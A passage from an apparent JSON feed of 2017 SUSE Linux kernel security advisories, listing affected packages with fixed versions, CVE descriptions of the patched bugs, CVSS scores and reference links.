"OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-xen", "packageFilename": "kernel-xen-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "noarch", "packageName": "kernel-source", "packageFilename": "kernel-source-3.12.61-52.69.2.noarch.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "ppc64le", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-3.12.61-52.69.2.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-xen-base-debuginfo", "packageFilename": "kernel-xen-base-debuginfo-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "noarch", "packageName": "kernel-macros", "packageFilename": "kernel-macros-3.12.61-52.69.2.noarch.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "ppc64le", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-3.12.61-52.69.2.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-xen-base", "packageFilename": "kernel-xen-base-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-xen-base", "packageFilename": "kernel-xen-base-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "ppc64le", "packageName": "kernel-default", "packageFilename": "kernel-default-3.12.61-52.69.2.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-default", "packageFilename": "kernel-default-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-default", "packageFilename": "kernel-default-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "2.3", "arch": "x86_64", "packageName": "kgraft-patch-3_12_61-52_69-default-1", "packageFilename": "kgraft-patch-3_12_61-52_69-default-1-2.3.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-default-base-debuginfo", "packageFilename": "kernel-default-base-debuginfo-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "2.3", "arch": "x86_64", "packageName": "kgraft-patch-3_12_61-52_69-xen-1", "packageFilename": "kgraft-patch-3_12_61-52_69-xen-1-2.3.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Public Cloud", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-ec2-extra", "packageFilename": "kernel-ec2-extra-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "s390x", "packageName": "kernel-default-base", "packageFilename": "kernel-default-base-3.12.61-52.69.2.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "s390x", "packageName": "kernel-default-base-debuginfo", "packageFilename": "kernel-default-base-debuginfo-3.12.61-52.69.2.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "ppc64le", "packageName": "kernel-default-base-debuginfo", "packageFilename": "kernel-default-base-debuginfo-3.12.61-52.69.2.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Public Cloud", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-ec2-debugsource", "packageFilename": "kernel-ec2-debugsource-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}], "edition": 1, "description": "The SUSE Linux Enterprise 12 kernel was updated to fix the following\n security bugs:\n\n - CVE-2017-7184: The Linux kernel allowed local users to obtain root\n privileges or cause a denial of service (heap-based out-of-bounds\n access) via unspecified vectors, as demonstrated during a Pwn2Own\n competition at CanSecWest 2017 (bnc#1030573, bnc#1028372).\n - CVE-2017-2636: Race condition in drivers/tty/n_hdlc.c in the Linux\n kernel allowed local users to gain privileges or cause a denial of\n service (double free) by setting the HDLC line discipline (bnc#1027565).\n\n", "reporter": "Suse", "published": "2017-03-30T06:10:44", "type": "suse", "title": "Security update for the Linux Kernel (important)", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-7184", "CVE-2017-2636"], "modified": "2017-03-30T06:10:44", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-03/msg00049.html", "id": "SUSE-SU-2017:0866-1", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-30T05:17:27", "references": ["https://bugzilla.suse.com/1027565", "https://bugzilla.suse.com/1030573", "https://bugzilla.suse.com/1028372"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "ppc64le", "packageName": "kernel-obs-build-debugsource", "packageFilename": "kernel-obs-build-debugsource-3.12.69-60.64.35.1.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-default-extra-debuginfo", "packageFilename": "kernel-default-extra-debuginfo-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Workstation Extension", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-default-extra", "packageFilename": "kernel-default-extra-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Live Patching", "OSVersion": "12", "packageVersion": "2.1", "arch": "x86_64", "packageName": "kgraft-patch-3_12_69-60_64_35-default-1", "packageFilename": "kgraft-patch-3_12_69-60_64_35-default-1-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Public Cloud", "OSVersion": "12", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-ec2-devel", "packageFilename": "kernel-ec2-devel-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-syms", "packageFilename": "kernel-syms-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "ppc64le", "packageName": "kernel-syms", "packageFilename": "kernel-syms-3.12.69-60.64.35.1.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-obs-build-debugsource", "packageFilename": "kernel-obs-build-debugsource-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-xen-debugsource", "packageFilename": "kernel-xen-debugsource-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "noarch", "packageName": "kernel-source", "packageFilename": "kernel-source-3.12.69-60.64.35.1.noarch.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "ppc64le", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-3.12.69-60.64.35.1.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-xen", "packageFilename": "kernel-xen-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-default", "packageFilename": "kernel-default-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "s390x", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-3.12.69-60.64.35.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-xen-base", "packageFilename": "kernel-xen-base-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-xen-debuginfo", "packageFilename": "kernel-xen-debuginfo-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "noarch", "packageName": "kernel-macros", "packageFilename": "kernel-macros-3.12.69-60.64.35.1.noarch.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-default-extra", "packageFilename": "kernel-default-extra-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "ppc64le", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-3.12.69-60.64.35.1.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "noarch", "packageName": "kernel-macros", "packageFilename": "kernel-macros-3.12.69-60.64.35.1.noarch.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "ppc64le", "packageName": "kernel-default-base", "packageFilename": "kernel-default-base-3.12.69-60.64.35.1.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-syms", "packageFilename": "kernel-syms-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "s390x", "packageName": "kernel-default-base", "packageFilename": "kernel-default-base-3.12.69-60.64.35.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-obs-build", "packageFilename": "kernel-obs-build-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "s390x", "packageName": "kernel-syms", "packageFilename": "kernel-syms-3.12.69-60.64.35.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "ppc64le", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-3.12.69-60.64.35.1.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "ppc64le", "packageName": "kernel-default-base-debuginfo", "packageFilename": "kernel-default-base-debuginfo-3.12.69-60.64.35.1.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Public Cloud", "OSVersion": "12", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-ec2-extra", "packageFilename": "kernel-ec2-extra-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "s390x", "packageName": "kernel-obs-build-debugsource", "packageFilename": "kernel-obs-build-debugsource-3.12.69-60.64.35.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Public Cloud", "OSVersion": "12", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-ec2-extra-debuginfo", "packageFilename": "kernel-ec2-extra-debuginfo-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Public Cloud", "OSVersion": "12", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-ec2", "packageFilename": "kernel-ec2-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "s390x", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-3.12.69-60.64.35.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-xen-base-debuginfo", "packageFilename": "kernel-xen-base-debuginfo-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Public Cloud", "OSVersion": "12", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-ec2-debugsource", "packageFilename": "kernel-ec2-debugsource-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-xen-debuginfo", "packageFilename": "kernel-xen-debuginfo-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.3", "arch": "noarch", "packageName": "kernel-docs", "packageFilename": "kernel-docs-3.12.69-60.64.35.3.noarch.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Workstation Extension", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-default-extra-debuginfo", "packageFilename": "kernel-default-extra-debuginfo-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Public Cloud", "OSVersion": "12", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-ec2-debuginfo", "packageFilename": "kernel-ec2-debuginfo-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "s390x", "packageName": "kernel-obs-build", "packageFilename": "kernel-obs-build-3.12.69-60.64.35.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "ppc64le", "packageName": "kernel-obs-build", "packageFilename": "kernel-obs-build-3.12.69-60.64.35.1.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "noarch", "packageName": "kernel-devel", "packageFilename": "kernel-devel-3.12.69-60.64.35.1.noarch.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "s390x", "packageName": "kernel-default-base-debuginfo", "packageFilename": "kernel-default-base-debuginfo-3.12.69-60.64.35.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "s390x", "packageName": "kernel-default-man", "packageFilename": "kernel-default-man-3.12.69-60.64.35.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-default-base-debuginfo", "packageFilename": "kernel-default-base-debuginfo-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "s390x", "packageName": "kernel-default", "packageFilename": "kernel-default-3.12.69-60.64.35.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Workstation Extension", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-default-base", "packageFilename": "kernel-default-base-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-xen-debugsource", "packageFilename": "kernel-xen-debugsource-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-default", "packageFilename": "kernel-default-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "s390x", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-3.12.69-60.64.35.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "noarch", "packageName": "kernel-devel", "packageFilename": "kernel-devel-3.12.69-60.64.35.1.noarch.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Workstation Extension", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "noarch", "packageName": "kernel-source", "packageFilename": "kernel-source-3.12.69-60.64.35.1.noarch.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "x86_64", "packageName": "kernel-xen", "packageFilename": "kernel-xen-3.12.69-60.64.35.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Live Patching", "OSVersion": "12", "packageVersion": "2.1", "arch": "x86_64", "packageName": "kgraft-patch-3_12_69-60_64_35-xen-1", "packageFilename": "kgraft-patch-3_12_69-60_64_35-xen-1-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.1", "packageVersion": "3.12.69-60.64.35.1", "arch": "ppc64le", "packageName": "kernel-default", "packageFilename": "kernel-default-3.12.69-60.64.35.1.ppc64le.rpm", "operator": "lt"}], "edition": 1, "description": "The SUSE Linux Enterprise 12 kernel was updated to fix the following\n security bugs:\n\n - CVE-2017-7184: The Linux kernel allowed local users to obtain root\n privileges or cause a denial of service (heap-based out-of-bounds\n access) via unspecified vectors, as demonstrated during a Pwn2Own\n competition at CanSecWest 2017 (bnc#1030573, bnc#1028372).\n - CVE-2017-2636: Race condition in drivers/tty/n_hdlc.c in the Linux\n kernel allowed local users to gain privileges or cause a denial of\n service (double free) by setting the HDLC line discipline (bnc#1027565).\n\n", "reporter": "Suse", "published": "2017-03-30T06:09:58", "type": "suse", "title": "Security update for the Linux Kernel (important)", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-7184", "CVE-2017-2636"], "modified": "2017-03-30T06:09:58", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-03/msg00048.html", "id": "SUSE-SU-2017:0865-1", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-07T16:49:24", "references": ["https://bugzilla.suse.com/1038564", "https://bugzilla.suse.com/1027575", "https://bugzilla.suse.com/1050751", "https://bugzilla.suse.com/1042892", "https://bugzilla.suse.com/1046191"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12.1", "packageVersion": "2.1", "arch": "x86_64", "packageName": "kgraft-patch-3_12_62-60_62-xen-10", "packageFilename": "kgraft-patch-3_12_62-60_62-xen-10-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12.1", "packageVersion": "2.1", "arch": "x86_64", "packageName": "kgraft-patch-3_12_62-60_62-xen-10", "packageFilename": "kgraft-patch-3_12_62-60_62-xen-10-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12.1", "packageVersion": "2.1", "arch": "x86_64", "packageName": "kgraft-patch-3_12_62-60_62-default-10", "packageFilename": "kgraft-patch-3_12_62-60_62-default-10-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12.1", "packageVersion": "2.1", "arch": "x86_64", "packageName": "kgraft-patch-3_12_62-60_62-default-10", "packageFilename": "kgraft-patch-3_12_62-60_62-default-10-2.1.x86_64.rpm", "operator": "lt"}], "description": "This update for the Linux Kernel 3.12.62-60_62 fixes several issues.\n\n The following security bugs were fixed:\n\n - CVE-2017-7533: A bug in inotify code allowed local users to escalate\n privilege (bsc#1050751).\n - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd subsystem in the Linux\n kernel allowed remote attackers to cause a denial of service (system\n crash) via a long RPC reply, related to net/sunrpc/svc.c,\n fs/nfsd/nfs3xdr.c, and fs/nfsd/nfsxdr.c (bsc#1046191).\n - CVE-2017-2636: Race condition in drivers/tty/n_hdlc.c in the Linux\n kernel allowed local users to gain privileges or cause a denial of\n service (double free) by setting the HDLC line discipline (bsc#1027575).\n - CVE-2017-9242: The __ip6_append_data function in net/ipv6/ip6_output.c\n in the Linux kernel is too late in checking whether an overwrite of an\n skb data structure may occur, which allowed local users to cause a\n denial of service (system crash) via crafted system calls (bsc#1042892).\n - CVE-2017-8890: The inet_csk_clone_lock function in\n net/ipv4/inet_connection_sock.c in the Linux kernel allowed attackers to\n cause a denial of service (double free) or possibly have unspecified\n other impact by leveraging use of the accept system call (bsc#1038564).\n\n", "edition": 1, "reporter": "Suse", "published": "2017-08-07T15:09:29", "title": "Security update for Linux Kernel Live Patch 7 for SLE 12 SP1 (important)", "type": "suse", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-7645", "CVE-2017-9242", "CVE-2017-2636", "CVE-2017-7533", "CVE-2017-8890"], "modified": "2017-08-07T15:09:29", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-08/msg00008.html", "id": "SUSE-SU-2017:2060-1", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-09T15:07:21", "references": ["https://bugzilla.suse.com/1038564", "https://bugzilla.suse.com/1027575", "https://bugzilla.suse.com/1050751", "https://bugzilla.suse.com/1042892", "https://bugzilla.suse.com/1046191"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12.1", "packageVersion": "2.1", "arch": "x86_64", "packageName": "kgraft-patch-3_12_62-60_64_8-xen-10", "packageFilename": "kgraft-patch-3_12_62-60_64_8-xen-10-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12.1", "packageVersion": "2.1", "arch": "x86_64", "packageName": "kgraft-patch-3_12_62-60_64_8-xen-10", "packageFilename": "kgraft-patch-3_12_62-60_64_8-xen-10-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12.1", "packageVersion": "2.1", "arch": "x86_64", "packageName": "kgraft-patch-3_12_62-60_64_8-default-10", "packageFilename": "kgraft-patch-3_12_62-60_64_8-default-10-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12.1", "packageVersion": "2.1", "arch": "x86_64", "packageName": "kgraft-patch-3_12_62-60_64_8-default-10", "packageFilename": "kgraft-patch-3_12_62-60_64_8-default-10-2.1.x86_64.rpm", "operator": "lt"}], "description": "This update for the Linux Kernel 3.12.62-60_64_8 fixes several issues.\n\n The following security bugs were fixed:\n\n - CVE-2017-7533: A bug in inotify code allowed local users to escalate\n privilege (bsc#1050751).\n - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd subsystem in the Linux\n kernel allowed remote attackers to 